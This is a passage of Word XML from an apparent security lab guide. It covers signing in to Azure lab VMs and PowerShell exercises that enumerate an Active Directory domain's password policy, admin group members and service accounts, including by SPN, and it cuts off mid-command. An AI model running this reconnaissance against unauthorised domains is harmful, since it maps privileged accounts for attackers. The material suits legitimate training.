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70E48FC8" w:rsidP="5E1249AA" w:rsidRDefault="70E48FC8" w14:paraId="5897B2EC" w14:textId="421EEC45">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:t>Getting Started</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="70E48FC8" w:rsidP="082FBA6D" w:rsidRDefault="70E48FC8" w14:paraId="6EBEF724" w14:textId="128A2B05" w14:noSpellErr="1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="64C2A67A">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Signing In</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="1E149EC1" w:rsidRDefault="5E55F281" w14:paraId="60189387" w14:textId="6D8360D7">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="1E149EC1">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>Open a web browser and navigate to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="1E149EC1" w:rsidRDefault="5E55F281" w14:paraId="09EB716E" w14:textId="298C6479">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidRPr="1E149EC1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
            <w:color w:val="0563C1"/>
          </w:rPr>
          <w:t>https://www.portal.azure.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="1E149EC1" w:rsidRDefault="5E55F281" w14:paraId="1A7F91C2" w14:textId="4362D4C5">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="1E149EC1">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>Log in with the student provided credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="1E149EC1" w:rsidRDefault="5E55F281" w14:paraId="4076E6E6" w14:textId="46B49370">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="1E149EC1">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>In the search bar, search for “Virtual Machines”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="7668DC7D" w:rsidRDefault="5E55F281" w14:paraId="5C001F8E" w14:textId="3EC135F6">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>Select the virtual machine that you want to log into then navigate to connect</w:t>
      </w:r>
      <w:r w:rsidRPr="7668DC7D" w:rsidR="3F0C84D9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>bastion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="1E149EC1" w:rsidRDefault="5E55F281" w14:paraId="64091CD7" w14:textId="7404E07C">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="1E149EC1">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>From here, log in with the provided lab credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="1E149EC1" w:rsidRDefault="5E55F281" w14:paraId="7E8B8AD0" w14:textId="4DBF6942">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="1E149EC1">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">An RDP or SSH session should open in your browser connected to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="1E149EC1">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>vm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="1E149EC1">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="1E149EC1" w:rsidRDefault="009D457E" w14:paraId="2EFAC3CC" w14:textId="321EC18A">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="1E149EC1" w:rsidRDefault="040FE182" w14:paraId="1E44D48A" w14:textId="37FF3EE5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display" w:eastAsia="Aptos Display" w:cs="Aptos Display"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1E149EC1">
        <w:t>Exercises</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="1E149EC1" w:rsidRDefault="040FE182" w14:paraId="55693871" w14:textId="503DC276">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1E149EC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="1E149EC1" w:rsidRDefault="00B25B89" w14:paraId="6A6064CE" w14:textId="4AC29B22">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="158" w:after="86" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="1E149EC1">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="1E149EC1" w:rsidRDefault="0AB20C1F" w14:paraId="41E9C303" w14:textId="56A614A6">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">On the Windows 10 client, open Powershell.exe (admin privileges are not required). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="5E1249AA" w:rsidRDefault="0AB20C1F" w14:paraId="4B485F94" w14:textId="17C1950D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>Enumerate for admin users, service accounts, password policy, MAQ, Functional levels:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0AB20C1F" w:rsidP="5E1249AA" w:rsidRDefault="0AB20C1F" w14:paraId="313FB94C" w14:textId="75D9310C">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e.g. Default Password Policy</w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="7AFB69D0">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7AFB69D0" w:rsidP="5E1249AA" w:rsidRDefault="7AFB69D0" w14:paraId="3E718605" w14:textId="43F2179B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ADDefaultPasswordPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="5E1249AA" w:rsidRDefault="0AB20C1F" w14:paraId="17E9AE14" w14:textId="6A52F6FB">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7668DC7D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e.g. Admin group members</w:t>
      </w:r>
      <w:r w:rsidRPr="7668DC7D" w:rsidR="32CD933C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3D7DD39B" w:rsidP="5E1249AA" w:rsidRDefault="3D7DD39B" w14:paraId="39BF223A" w14:textId="57C12D8F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:after="158" w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>adminGroups</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="51F30E48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>= @(“Domain Admins”, “Enterprise Admins”, “Schema Admins”, “</w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="2FA1567C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Administrators”)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2FA1567C" w:rsidP="5E1249AA" w:rsidRDefault="2FA1567C" w14:paraId="540EBF94" w14:textId="4102EAD8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:after="158" w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>adminUsers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="6D52C89D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="6D52C89D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> foreach($group in $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="6D52C89D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>adminGroups</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="6D52C89D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>){Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="6D52C89D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ADGroupmember</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="6D52C89D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> –Identity $gro</w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="2677FFF6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">up –Recursive | Select Name, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="2677FFF6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SamAccountName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="2677FFF6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="2677FFF6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ObjectClass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="2677FFF6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0059B31F" w:rsidP="5E1249AA" w:rsidRDefault="0059B31F" w14:paraId="2BACDB66" w14:textId="00754B1D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:after="158" w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>adminUsers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | Sort Name | Get-Unique -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AsString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="6D52C89D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="2FA1567C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E1249AA" w:rsidP="5E1249AA" w:rsidRDefault="5E1249AA" w14:paraId="6854B0C6" w14:textId="515BF843">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="1E149EC1" w:rsidRDefault="0AB20C1F" w14:paraId="3C9C8902" w14:textId="53321D80">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e.g. Service Accounts via pattern matching</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7B001463" w:rsidP="5E1249AA" w:rsidRDefault="7B001463" w14:paraId="3737A563" w14:textId="3346BC7B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:after="158" w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ADUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> –Filter {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SamAccountName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> –like “svc-*” -or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SamAccountName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> –like </w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="37FCFC6E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="37FCFC6E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="37FCFC6E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">-*” -or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="37FCFC6E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SamAccountName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="37FCFC6E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> –like “app-*”} -Properties </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="37FCFC6E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Displayname,PasswordNeverExpires</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="1E149EC1" w:rsidRDefault="0AB20C1F" w14:paraId="4A55B6A6" w14:textId="1E525A38">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Via SPN existence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="38AB9B9F" w:rsidP="5E1249AA" w:rsidRDefault="38AB9B9F" w14:paraId="460974D7" w14:textId="2A777D70">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:after="158" w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-</w:t>
      </w:r>
